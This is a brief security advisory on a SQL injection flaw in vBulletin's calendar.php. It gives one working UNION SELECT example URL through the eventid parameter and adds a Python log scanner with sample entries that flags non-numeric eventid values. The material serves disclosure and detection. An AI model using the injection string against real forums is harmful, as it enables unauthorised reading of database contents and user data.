
vBulletin Calendar Script SQL Injection Vulnerability

The following example was provided:

http://www.example.com/[software_installation_path]/calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate

(Note that the underlying database must support the UNION command for this example to work.)
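Requests of this shape stand out in web server access logs because a legitimate eventid is a plain integer. The following detection sketch is an added example, not part of the original advisory; it assumes combined-format access logs, and the function names, paths and sample entries are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target in a combined-format access-log entry. (.+?) rather than \S+
# so that targets sent with literal, unencoded spaces are still captured.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]+")


def suspicious_eventid(log_line):
    """Return the decoded eventid if a calendar.php request carries a
    non-numeric one, else None. Empty values are treated as benign
    (an assumption made for this example)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not unquote(target.path).endswith("/calendar.php"):
        return None
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == "eventid" and value and not DIGITS_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, eventid) for every suspicious entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_eventid(line)
        if value is not None:
            hits.append((n, value))
    return hits


# Constructed sample entries (documentation IP range, made-up paths and sizes).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2009:10:00:00 +0000] "GET /forum/calendar.php?s=&action=edit&eventid=14 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2009:10:00:05 +0000] "GET /forum/calendar.php?s=&action=edit&eventid=14+union+(SELECT+userid+FROM+calendar_events) HTTP/1.1" 200 5311',
    '198.51.100.9 - - [01/Jan/2009:10:00:09 +0000] "GET /forum/calendar.php?action=edit&eventid=14 order by eventdate HTTP/1.0" 200 5311',
    '198.51.100.7 - - [01/Jan/2009:10:00:12 +0000] "GET /forum/index.php?eventid=abc HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric eventid {value!r}")
```

The same integer-only rule applied at the application or web application firewall layer rejects the request before it reaches the database.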







 

Copyright 2009, SecurityFocus